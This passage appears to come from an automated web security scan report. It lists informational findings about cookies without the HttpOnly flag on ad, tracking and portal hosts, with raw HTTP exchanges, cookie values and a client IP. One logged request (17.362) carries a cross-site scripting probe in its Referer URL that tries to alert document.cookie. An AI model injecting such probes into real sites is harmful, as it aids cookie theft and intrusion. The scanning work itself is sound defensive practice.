Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFeUOFbwIUllNab/cemd1+k3oMcz9wc4mVCGdkHCrwWmaePNeODkXbq2K+tQyP8LR5ylRhRNgirDTpoIcrk+cIkXXfbtlOSmsfU1UZkujEsLbnRvi1mdYlE9GqFbJhJJ6Bxw2/6Vp1FAEA8dbQxknNO77OBB0EhWDzhf+pHpllJGeHUdUpo++k4d+c5bY1Qvx4d5W47BVKBDhTd7AdL12fLl6zFZaTu+rTxdLhlftv2v2MUDe2Y91CvpzYDUg3O3napeeKccCImESkDVzox9S9Nh2WBZtMXhJbvQq6; Domain=.revsci.net; Expires=Mon, 30-Jan-2012 01:30:06 GMT; Path=/
udm_0=MLv3NSMJaSpn3g1FgecyID/YTWjxcmn+jRwDtK6yKGSqLiDCbz2rscDhNkPJfBSzlL4dxsqrgwGwTcU0yVOl93x0bsnVOXBsYOd//QgpPolrbS4+Nw8pZmwuLu/BFF7QsvnGgRit9IQdrMe68QJG+xARlbfeqCut/4QAwRNJQR/XlVBysq/jrFHdWb+7tcucPJDdqOzrQiKJQMWveoQqCvYVuCItXlfGZkoyggle3az/HvQUB76nGMvM6aK+iHbgmmWUZ7vTesbzpgDUtcCDBy1OP8b/EWRyH4uNf3IiIEN7uN/unTN7wj+d3aJN+S/uAmGvQTMbx92ct+tNW/fLsANU3MGbWx9PWZB8OCJZ1Jjg7/r6sb6HKhDbfUhULrzcm41SNIyqo/UPwJQztEuuuiLIririPZSp5K8cha5iUvwBePNVNuTjmqDgmws5XPyigl5UM6qcPfeQiBpeVKzEw1/Vq2msHxmzpfSHKTD8e90Ps1HEYrkFOPic6v6njtkrtHLHDXb971WO7HB/0bEjCaOTtCC9kXesDSj90s8MzA++V01FrJ3dgnIeesBl0xJxLJRIU5VhoyLHXgkVIX37uD6r7oH0cMDf2K7Eaupks0wRDpggvT5EFH8JlWlBVNXM79nOtYm2WHhGrjCqhrat51GMQL5cfCHYT3mZFcmfFrSHZGkbkOFSTPWvaB2MEzzvZmVxJjOFYAeGcJdekdsk/yPfbRlXWhTqBzXFxnBdkAVVgrh2H6Jj/iMj22RD7lrrnu0tLor5OZ8cn6Ym51edHhgpShQyzLU9V8EG0n7wfEQLBINnz6LPBtX6+8SS5RQrtiF/eGzW8dYK23z34XahxqULrJN5RQMIu5VTy7/Ghw6qjoZ/sD5mTNDI+RcSBdg0d0+9f7uCZnkisLc6SVCJ5iUT5F9LuU/+AfJo2l8alr6bDLTj2kS4UGIT3Ac5OdkWIBI/wfXDydN6T1e3I63W6L/h9vQpbrgZAA/KjPp2Yq4gjVuQsW3u4AbuNaZJ51egQSvC1zJn+6C/ibzxCxGnJ3bIiVn23LgeutuBiHfVN+6fwIGIhfLz3WmndFELqStWoNJq+LCRtr5BMYrCX5JQu49xYlIiFztxwRQPG4DDLowZx9qjXQOR8xq6IWWic6t7idKbOc4DlCW/3azG8wjO4MNyD2fCSb0csZSqhgdPg8/egWktt/TP2cZ4dhF+JU3+tmQ7e5p2; Domain=.revsci.net; Expires=Mon, 30-Jan-2012 01:30:06 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.352. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-e4m3Yko6bFYVc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EBAAG6ANq0itiBDbz6HJXbIAAboBAfcFgZUAmtGkrxPyD5ELwXzlIG3R8gDChB0bohjR4QCJENoVz2kQ4QANEOECjRk_44OSDUKoTRMW4QsYEfopG3wRwQsRCFGx4QA9EAAiABcoSCVfgoGyODsR4Zoh; expires=Sat, 30-Apr-2011 01:29:45 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.353. http://ptsd.eyewonder.com/ewr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ptsd.eyewonder.com
Path:	/ewr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ew=MDAwMTI5NjMzNTIzMjE4MTAwMDAyMDM3NzFfMTI5NjM1MDQ2MjU2MV8xMV9fXzA; Domain=.eyewonder.com; Expires=Sun, 27-Mar-2011 01:21:02 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.354. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=ckaRNJpwIg02FsBCdbdBbgwUwXwGI8Y4FsBCYTeBbgQ3gZwGIQTnGsBCF2pBbgAohXwGIYZ4FsBCKGeBbgwohXwGIca4FsBCiGeBbgQshXwGwOIAM/oxxL7YCwAoGlxr1NQcKa0/GK2AI9Yx4M53EkL3FAwgPXw6TVAJsuWB/0mhxfa7GIaWG6crMaw41Z82kq1B6bjhbp6bDwWZGl3r4fQsMao9wa3BW8oh23I9HsfzFg/sNiQQoawGCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
F1=BwRqF1E; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
BASE=YnQIw8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGZzKkH34A2YJp0mlrsdsoHFQpedEnsa1jeNn6DX4gEe8q7+PfCnaoMfuk12NE/thpzCn5VOb439eAtA8H94fPT2rXaUFI5B8ZpnMfoxItOvXLGaW4J4F0dmWeier4pMWAS2vxuWBCRUhUAUMdxmDZkV0elS56NOPbQGc4/x8C3O1qy6+lsqVS0JVS4aPSuzn3Ehr11AyP/sYZxiJMJ62cPqgtVaKoBR0tBKArR5M6ZEkksVxhNYu5MwpJ5jE+KhQNwbqIaCZcBvRiSaOOCc9v4hyiZTg86THBE/lb4ruixI+EufQQeHrI0KcamCQSOCxGBBEycusl82vNHuKFXJuLVCAU35iawlCzwpTzbs5w3W/ZCdgMBRs9GM44HthzXXU1dDY4OPC59B0jBKtwOuWupJMebppDp4Oazc+50+y94tvsDw3jRRrBy/Mm/RtrVR0xC+ByQvRH!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
ROLL=v5Q2U0M!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
6566708061=_4d44bf07,6566708061,730461^950192^1183^0,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 18:08:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125
Date: Sun, 30 Jan 2011 18:08:28 GMT
Connection: close
Set-Cookie: C2=ckaRNJpwIg02FsBCdbdBbgwUwXwGI8Y4FsBCYTeBbgQ3gZwGIQTnGsBCF2pBbgAohXwGIYZ4FsBCKGeBbgwohXwGIca4FsBCiGeBbgQshXwGwOIAM/oxxL7YCwAoGlxr1NQcKa0/GK2AI9Yx4M53EkL3FAwgPXw6TVAJsuWB/0mhxfa7GIaWG6crMaw41Z82kq1B6bjhbp6bDwWZGl3r4fQsMao9wa3BW8oh23I9HsfzFg/sNiQQoawGCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
Set-Cookie: F1=BwRqF1E; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
Set-Cookie: BASE=YnQIw8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGZzKkH34A2YJp0mlrsdsoHFQpedEnsa1jeNn6DX4gEe8q7+PfCnaoMfuk12NE/thpzCn5VOb439eAtA8H94fPT2rXaUFI5B8ZpnMfoxItOvXLGaW4J4F0dmWeier4pMWAS2vxuWBCRUhUAUMdxmDZkV0elS56NOPbQGc4/x8C3O1qy6+lsqVS0JVS4aPSuzn3Ehr11AyP/sYZxiJMJ62cPqgtVaKoBR0tBKArR5M6ZEkksVxhNYu5MwpJ5jE+KhQNwbqIaCZcBvRiSaOOCc9v4hyiZTg86THBE/lb4ruixI+EufQQeHrI0KcamCQSOCxGBBEycusl82vNHuKFXJuLVCAU35iawlCzwpTzbs5w3W/ZCdgMBRs9GM44HthzXXU1dDY4OPC59B0jBKtwOuWupJMebppDp4Oazc+50+y94tvsDw3jRRrBy/Mm/RtrVR0xC+ByQvRH!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
Set-Cookie: ROLL=v5Q2U0M!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 6566708061=_4d44bf07,6566708061,730461^950192^1183^0,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

17.355. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=ekaRNJpwIg02FsBCdbdBbgwUwXwGI8Y4FsBCYTeBbgQ3gZwGIQTnGsBCF2pBbgAohXwGIYZ4FsBCKGeBbgwohXwGIca4FsBCiGeBbgQshXwGwOIAM/oxxL7YCwAoGlxr1NQcKa0/GK2AI9Yx4M53EkL3FAwgPXw6TVAJsuWB/0mhxfa7GIaWG6crMaw41Z82kq1B6bjhbp6bDwWZGl3r4fQsMao9wa3BW8oh23I9HsfzFg/sNiQQoawGCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
F1=B4RqF1E; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
BASE=YnQIw8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGZzKkH34A2YJp0mlrsdsoHFQpedEnsa1jeNn6DX4gEe8q7+PfCnaoMfuk12NE/thpzCn5VOb439eAtA8H94fPT2rXaUFI5B8ZpnMfoxItOvXLGaW4J4F0dmWeier4pMWAS2vxuWBCRUhUAUMdxmDZkV0elS56NOPbQGc4/x8C3O1qy6+lsqVS0JVS4aPSuzn3Ehr11AyP/sYZxiJMJ62cPqgtVaKoBR0tBKArR5M6ZEkksVxhNYu5MwpJ5jE+KhQNwbqIaCZcBvRiSaOOCc9v4hyiZTg86THBE/lb4ruixI+EufQQeHrI0KcamCQSOCxGBBEycusl82vNHuKFXJuLVCAU35iawlCzwpTzbs5w3W/ZCdgMBRs9GM44HthzXXU1dDY4OPC59B0jBKtwOuWupJMebppDp4Oazc+50+y94tvsDw3jRRrBy/Mm/RtrVR0xC+ByQvRH!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
ROLL=v5Q2U0M!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
6566708061=_4d44bf07,6566708061,,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 18:08:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125
Date: Sun, 30 Jan 2011 18:08:30 GMT
Connection: close
Set-Cookie: C2=ekaRNJpwIg02FsBCdbdBbgwUwXwGI8Y4FsBCYTeBbgQ3gZwGIQTnGsBCF2pBbgAohXwGIYZ4FsBCKGeBbgwohXwGIca4FsBCiGeBbgQshXwGwOIAM/oxxL7YCwAoGlxr1NQcKa0/GK2AI9Yx4M53EkL3FAwgPXw6TVAJsuWB/0mhxfa7GIaWG6crMaw41Z82kq1B6bjhbp6bDwWZGl3r4fQsMao9wa3BW8oh23I9HsfzFg/sNiQQoawGCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
Set-Cookie: F1=B4RqF1E; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
Set-Cookie: BASE=YnQIw8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGZzKkH34A2YJp0mlrsdsoHFQpedEnsa1jeNn6DX4gEe8q7+PfCnaoMfuk12NE/thpzCn5VOb439eAtA8H94fPT2rXaUFI5B8ZpnMfoxItOvXLGaW4J4F0dmWeier4pMWAS2vxuWBCRUhUAUMdxmDZkV0elS56NOPbQGc4/x8C3O1qy6+lsqVS0JVS4aPSuzn3Ehr11AyP/sYZxiJMJ62cPqgtVaKoBR0tBKArR5M6ZEkksVxhNYu5MwpJ5jE+KhQNwbqIaCZcBvRiSaOOCc9v4hyiZTg86THBE/lb4ruixI+EufQQeHrI0KcamCQSOCxGBBEycusl82vNHuKFXJuLVCAU35iawlCzwpTzbs5w3W/ZCdgMBRs9GM44HthzXXU1dDY4OPC59B0jBKtwOuWupJMebppDp4Oazc+50+y94tvsDw3jRRrBy/Mm/RtrVR0xC+ByQvRH!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
Set-Cookie: ROLL=v5Q2U0M!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 6566708061=_4d44bf07,6566708061,,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=730461/size=728090/u=2/bnum=12110217/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmsn.whitepages.com%252F

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/
F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/
BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/
ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/
12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.357. http://realestate.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.redacted
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=3caf83355b934bd3a1c3218117df8e52; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=2B753083113044228D3A08B4704A491E; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:34 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.358. http://realestate.redacted/OmRedir.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.redacted
Path:	/OmRedir.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=c7e4694c7e8948a0a852cd53f852c2cd; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=E61C86B6F829406795830566D6BAA5ED; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:42 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OmRedir.aspx HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.359. http://realestate.redacted/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.redacted
Path:	/article.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=93ed9493a41741609bf76926d6d18474; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=BB4451F20548401188ACB52B32195513; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /article.aspx HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.360. http://realestate.redacted/slideshow.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.redacted
Path:	/slideshow.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=743d5dfc20ea49fc927bbf5e52addae3; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=D11A40DFEBAF4362805A6A47E91AD76D; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:35 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /slideshow.aspx HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.361. http://redtape.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redtape.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=3df9ab73640c1ed44c1858b2a3c651a7; expires=Sat, 25-Jan-2031 02:18:21 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: redtape.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.362. http://s18.sitemeter.com/js/counter.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s18.sitemeter.com
Path:	/js/counter.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

IP=173%2E193%2E214%2E243; path=/js

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/counter.asp?site=s18neumedia HTTP/1.1
Host: s18.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight2d710%22%3balert(document.cookie)//68483822cd8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:38:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7248
Content-Type: application/x-javascript
Expires: Sun, 30 Jan 2011 01:48:10 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...

17.363. https://sb.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sb.voicefive.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=c9bed8b-173.223.190.110-1296351426; expires=Tue, 29-Jan-2013 01:37:06 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b HTTP/1.1
Host: sb.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.364. http://search.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.redacted
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_HOP=I=1&TS=1296351428; domain=.redacted; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.redacted; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: search.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.365. https://security.live.com/LoginStage.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://security.live.com
Path:	/LoginStage.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

xid=ef438ff2-3226-4bb0-84b7-a945e2ffe5ee&&TK2xxxxxxx1B06&61; domain=.live.com; path=/
mktstate=S=783525862&U=&E=&P=&B=en; domain=.live.com; path=/
mkt1=norm=en; domain=.live.com; path=/
mkt2=marketing=en-us; domain=.security.live.com; path=/
wlv=A|_-d:s*phzLBQ.2+1+0+3; domain=.live.com; path=/
E=P:+L7nTSGOzYg=:BemJ+zHQEPLPNnFkDqtAse01gEABPmRe8NpO46JTjNc=:F; domain=.live.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LoginStage.aspx HTTP/1.1
Host: security.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.366. https://security.live.com/LoginStage.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://security.live.com
Path:	/LoginStage.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mkt=ep=en-US; domain=.live.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.367. http://seedmagazine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seedmagazine.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

exp_last_visit=981011942; expires=Mon, 30-Jan-2012 02:19:02 GMT; path=/
exp_last_activity=1296371942; expires=Mon, 30-Jan-2012 02:19:02 GMT; path=/
exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: seedmagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.368. http://seg.admailtiser.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seg.admailtiser.com
Path:	/st

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ciconv0=6940311042157494960$8601-b691916b-c3bc-4ec5-b037-99e1592c243a; Domain=.admailtiser.com; Expires=Mon, 31-Jan-2011 01:23:54 GMT; Path=/
ciconv1=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2; Domain=.admailtiser.com; Expires=Mon, 31-Jan-2011 01:23:54 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.369. https://signup.live.com/signup.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://signup.live.com
Path:	/signup.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

mkt=ep=en-US; domain=.live.com; path=/; secure
xid=ffbfad06-ce49-4990-af01-ca3897d55b66&&CO1xxxxxxC208&61; domain=.live.com; path=/; secure
mktstate=S=-1109498027&U=&E=en-us&B=en&P=; domain=.live.com; path=/; secure
mkt1=norm=en-us; domain=.live.com; path=/; secure
mkt2=marketing=en-us; domain=.signup.live.com; path=/; secure

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.370. http://social.entertainment.redacted/bloglist.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.redacted
Path:	/bloglist.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=339e672cfcfc4e9bb100367db460c745; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
